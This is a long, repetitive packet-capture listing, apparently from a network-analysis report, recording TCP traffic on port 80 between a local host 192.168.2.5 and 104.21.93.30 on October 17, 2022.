                                                                                                                                  Oct 17, 2022 22:06:38.973484993 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973501921 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973512888 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973525047 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973548889 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973570108 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973572016 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973596096 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973615885 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973622084 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973648071 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973660946 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973674059 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973699093 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973711014 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973721981 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973747969 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973759890 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973771095 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973794937 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973805904 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973815918 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973840952 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973858118 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973865032 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973887920 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973901033 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973908901 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973931074 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973943949 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.973952055 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973973036 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973994017 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.973994970 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974018097 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974037886 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974041939 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974066973 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974077940 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974092007 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974117994 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974129915 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974143982 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974165916 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974181890 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974189043 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974210024 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974231005 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974235058 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974253893 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974272966 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974277973 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974302053 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974324942 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974334002 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974351883 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974370956 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974378109 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974401951 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974415064 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974425077 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974447012 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974468946 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974469900 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974494934 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974519014 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974543095 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974545002 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974567890 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974577904 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974590063 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974606037 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974612951 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974636078 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974662066 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974668026 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974688053 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974700928 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974711895 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974735975 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974750996 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974761009 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974785089 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974802971 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974807978 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974833012 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974847078 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974858046 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974899054 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974900961 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974922895 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974948883 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974963903 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.974971056 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.974996090 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975014925 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975022078 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975048065 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975060940 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975073099 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975096941 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975121021 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975123882 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975145102 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975167036 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975168943 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975193024 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975203991 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975215912 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975240946 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975261927 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975264072 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975281954 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975300074 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975306988 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975316048 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975332975 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975346088 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975348949 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975366116 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975369930 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975382090 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975399017 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975414038 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975415945 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975430965 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975431919 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975447893 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975464106 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975481987 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975483894 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975498915 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975514889 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975523949 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975531101 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975547075 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975548983 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975563049 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975569963 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975579977 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975595951 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975605965 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975611925 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975629091 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975645065 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975647926 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975661039 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975677013 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975682020 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975692987 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975704908 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975708961 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975727081 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975739002 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975744963 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975761890 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975763083 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975778103 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975795031 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975809097 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975811005 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975826979 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975832939 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975843906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975861073 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975871086 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975877047 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975894928 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975899935 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975910902 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975927114 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975944042 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975955009 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975960970 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975979090 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.975992918 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.975995064 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976011038 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976012945 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976028919 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976044893 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976049900 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976062059 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976083994 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976089954 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976108074 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976114035 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976131916 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976151943 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976156950 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976180077 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976205111 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976218939 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976229906 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976252079 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976288080 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976309061 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976326942 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976340055 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976342916 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976360083 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976365089 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976377964 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976394892 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976398945 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976412058 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976428986 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976438046 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976444960 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976460934 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976463079 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976479053 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976496935 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976502895 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976514101 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976536989 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976560116 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976563931 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976587057 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976602077 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976609945 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976625919 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976633072 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976655960 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976671934 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976677895 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976700068 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976722002 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976726055 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976746082 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976771116 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976772070 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976797104 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976810932 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976821899 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976847887 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976866961 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976872921 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976898909 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976921082 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976927996 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976953983 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.976969957 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.976979017 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977004051 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977018118 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977029085 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977054119 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977066040 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977078915 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977101088 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977123976 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977128029 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977153063 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977174044 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977174997 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977199078 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977211952 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977225065 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977248907 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977256060 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977267027 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977283955 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977296114 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977303028 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977324963 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977341890 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977349997 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977372885 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977395058 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977397919 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977421999 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977441072 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977447033 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977471113 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977488041 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977497101 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977519989 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977543116 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977545023 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977575064 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977591991 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977597952 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977624893 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977643967 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977650881 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977693081 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977719069 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977729082 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977742910 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977750063 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977765083 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977792025 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977812052 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977818966 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977844954 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977854013 CEST4969280192.168.2.5104.21.93.30
                                                                                                                                  Oct 17, 2022 22:06:38.977866888 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977893114 CEST8049692104.21.93.30192.168.2.5
                                                                                                                                  Oct 17, 2022 22:06:38.977907896 CEST4969280192.168.2.5104.21.93.30
